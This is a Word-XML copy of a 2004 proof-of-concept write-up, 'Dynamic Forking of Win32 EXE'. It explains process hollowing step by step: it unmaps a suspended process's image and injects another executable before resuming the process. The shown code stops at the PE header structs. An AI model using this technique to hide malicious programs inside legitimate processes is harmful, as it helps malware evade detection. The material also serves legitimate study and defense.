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B75" w:rsidRDefault="00EC33D1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SIG^2 Secure Code Study Project Proof-Of-Concept</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Dynamic Forking of Win32 EXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>by Tan Chew Keong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7 April 2004</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Download</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Introduction</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This Proof-Of-Concept (POC) code demonstrates the dynamic loading of a Win32 EXE into the memory space of a process that was created using the CreateProcess API with the CREATE_SUSPENDED parameter. This code also shows how to perform manual relocation of a Win32 EXE and how to unmap the original image of an EXE from its process space.</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Description of Technique</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Under Windows, a process can be created in suspend mode using the CreateProcess API with the CREATE_SUSPENDED parameter. The EXE image will be loaded into memory by Windows but execution will not begin until the ResumeThread API is used. Before calling ResumeThread, it is possible to read and write this process&amp;#39;s memory space using APIs like ReadProcessMemory and WriteProcessMemory. This makes it possible to overwrite the image of the original EXE with the image of another EXE, thus enabling the execution of the second EXE within the memory space of the first EXE. This can be achieved with the following sequence of steps.</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Use the CreateProcess API with the CREATE_SUSPENDED parameter to create a suspended process from any EXE file. (Call this the first EXE).</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Call GetThreadContext API to obtain the register values (thread context) of the suspended process. The EBX register of the suspended process points to the process&amp;#39;s PEB. The EAX register contains the entry point of the process (first EXE).</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Obtain the base-address of the suspended process from its PEB, i.e. at [EBX+8]</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Load the second EXE into memory (using ReadFile) and perform the neccessary alignment manually. This is required if the file alignment is different from the memory alignment</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If the second EXE has the same base-address as the suspended process and its image-size is &lt;= to the image-size of the suspended process, simply use the WriteProcessMemory function to write the image of the second EXE into the memory space of the suspended process, starting at the base-address.</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xml:space="preserve">Otherwise, unmap the image of the first EXE using ZwUnmapViewOfSection (exported by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ntdll.dll) and use VirtualAllocEx to allocate enough memory for the second EXE within the memory space of the suspended process. The VirtualAllocEx API must be supplied with the base-address of the second EXE to ensure that Windows will give us memory in the required region. Next, copy the image of the second EXE into the memory space of the suspended process starting at the allocated address (using WriteProcessMemory).</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If the unmap operation failed but the second EXE is relocatable (i.e. has a relocation table), then allocate enough memory for the second EXE within the suspended process at any location. Perform manual relocation of the second EXE based on the allocated memory address. Next, copy the relocated EXE into the memory space of the suspended process starting at the allocated address (using WriteProcessMemory).</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Patch the base-address of the second EXE into the suspended process&amp;#39;s PEB at [EBX+8].</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Set EAX of the thread context to the entry point of the second EXE.</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Use the SetThreadContext API to modify the thread context of the suspended process.</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Use the ResumeThread API to resume execute of the suspended process.</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Techniques Demonstrated by POC Code</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Manual relocation of an EXE using its Relocation Table.</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Unmapping the image of the original EXE using ZwUnmapViewOfSection.</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Reading and Writing to a process&amp;#39;s memory space using ReadProcessMemory and WriteProcessMemory.</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Changing the base-address of a process by modifying its value in the process&amp;#39;s PEB.</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Usage</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loadEXE.exe &lt;EXE filename&gt;</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This POC code will use the CreateProcess API to create a process in suspend mode from calc.exe. It would then load and align the EXE file given by the "EXE filename" commandline parameter. Following this, it would copy the aligned EXE image into calc.exe&amp;#39;s memory space and resume execution.</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lastRenderedPageBreak/>
        <w:br/>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Contacts</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For further enquries or to submit malicious code for our analysis, email them to the following.</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Overall-in-charge: Tan Chew Keong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC33D1" w:rsidRDefault="00EC33D1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC33D1" w:rsidRDefault="00EC33D1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC33D1" w:rsidRDefault="00EC33D1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00042699" w:rsidRPr="00042699" w:rsidRDefault="00042699" w:rsidP="00042699">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="384" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>补充：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042699" w:rsidRPr="00042699" w:rsidRDefault="00042699" w:rsidP="00042699">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>复制内容到剪贴板</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042699" w:rsidRPr="00042699" w:rsidRDefault="00042699" w:rsidP="00042699">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="FFFFFF"/>
          <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CAD9EA"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="FFFFFF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042699" w:rsidRPr="00042699" w:rsidRDefault="00042699" w:rsidP="00042699">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//*******************************************************************************************************</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// loadEXE.cpp : Defines the entry point for the console application.</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Proof-Of-Concept Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// Copyright (c) 2004</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// All rights reserved.</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Permission is hereby granted, free of charge, to any person obtaining a</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// copy of this software and associated documentation files (the</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// "Software"), to deal in the Software without restriction, including</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// without limitation the rights to use, copy, modify, merge, publish,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// distribute, and/or sell copies of the Software, and to permit persons</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// to whom the Software is furnished to do so, provided that the above</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// copyright notice(s) and this permission notice appear in all copies of</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// the Software and that both the above copyright notice(s) and this</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// permission notice appear in supporting documentation.</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THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NONINFRINGEMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.</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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// loadEXE &lt;EXE filename&gt;</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This will execute calc.exe in suspended mode and replace its image with</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// the new EXE&amp;#39;s image.  The thread is then resumed, thus causing the new EXE to</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// execute within the process space of svchost.exe.</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#include &lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;tlhelp32.h&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;psapi.h&gt;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struct PE_Header </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unsigned long signature;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short machine;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short numSections;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long timeDateStamp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long pointerToSymbolTable;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long numOfSymbols;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short sizeOfOptionHeader;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short characteristics;</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struct PE_ExtHeader</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lastRenderedPageBreak/>
        <w:t>  unsigned short magic;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned char majorLinkerVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned char minorLinkerVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfCode;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfInitializedData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfUninitializedData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long addressOfEntryPoint;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long baseOfCode;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long baseOfData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long imageBase;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sectionAlignment;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long fileAlignment;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short majorOSVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short minorOSVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short majorImageVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short minorImageVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
